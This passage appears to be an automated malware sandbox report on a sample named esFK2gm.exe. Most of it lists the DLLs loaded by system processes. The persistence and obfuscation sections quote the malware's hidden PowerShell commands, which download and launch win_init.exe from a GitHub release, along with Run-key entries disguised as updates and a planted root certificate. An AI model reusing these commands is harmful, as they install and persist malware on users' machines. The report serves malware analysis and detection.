                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: aphostservice.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: networkhelper.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: userdataplatformhelperutil.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: mccspal.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: vaultcli.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: dmcfgutils.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: wintypes.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: dmcmnutils.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: dmxmlhelputils.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: inproclogger.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: windows.networking.connectivity.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: synccontroller.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: aphostclient.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: accountaccessor.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: dsclient.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: systemeventsbrokerclient.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: mccsengineshared.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: userdatalanguageutil.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: cemapi.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: userdatatypehelperutil.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: phoneutil.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
                          Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: powrprof.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: umpdc.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: dhcpcsvc6.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: dhcpcsvc.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Section loaded: gpapi.dll
                          Source: C:\Windows\System32\notepad.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
                          Source: C:\Users\user\Desktop\esFK2gm.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: Window Recorder Window detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: esFK2gm.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                          Source: esFK2gm.exe Static file information: File size 8918528 > 1048576
                          Source: esFK2gm.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2a9e00
                          Source: esFK2gm.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2b9400
                          Source: esFK2gm.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                          Data Obfuscation

                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: esFK2gm.exe Static PE information: section name: .xdata
                          Source: esFK2gm.exe Static PE information: section name: /4
                          Source: esFK2gm.exe Static PE information: section name: /19
                          Source: esFK2gm.exe Static PE information: section name: /32
                          Source: esFK2gm.exe Static PE information: section name: /46
                          Source: esFK2gm.exe Static PE information: section name: /65
                          Source: esFK2gm.exe Static PE information: section name: /78
                          Source: esFK2gm.exe Static PE information: section name: /90
                          Source: esFK2gm.exe Static PE information: section name: .symtab
                          Source: win_init.exe.5.dr Static PE information: section name: .xdata
                          Source: win_init.exe.5.dr Static PE information: section name: /4
                          Source: win_init.exe.5.dr Static PE information: section name: /19
                          Source: win_init.exe.5.dr Static PE information: section name: /32
                          Source: win_init.exe.5.dr Static PE information: section name: /46
                          Source: win_init.exe.5.dr Static PE information: section name: /65
                          Source: win_init.exe.5.dr Static PE information: section name: /78
                          Source: win_init.exe.5.dr Static PE information: section name: /90
                          Source: win_init.exe.5.dr Static PE information: section name: .symtab
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB9AB2473D push E85AFB4Ah; ret 5_2_00007FFB9AB247F9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB9AB247AD push E85AFB4Ah; ret 5_2_00007FFB9AB247F9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFB9AB23783 pushad ; ret 9_2_00007FFB9AB23791

                          Persistence and Installation Behavior

                          Source: C:\Users\user\Desktop\esFK2gm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\win_init.exe

                          Boot Survival

                          Source: C:\Users\user\Desktop\esFK2gm.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinUpdate cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Users\user\Desktop\esFK2gm.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUpdate cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Users\user\Desktop\esFK2gm.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinUpdate
                          Source: C:\Users\user\Desktop\esFK2gm.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUpdate
                          Source: C:\Users\user\Desktop\esFK2gm.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                          Source: C:\Users\user\Desktop\esFK2gm.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                          Source: C:\Users\user\Desktop\esFK2gm.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\notepad.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
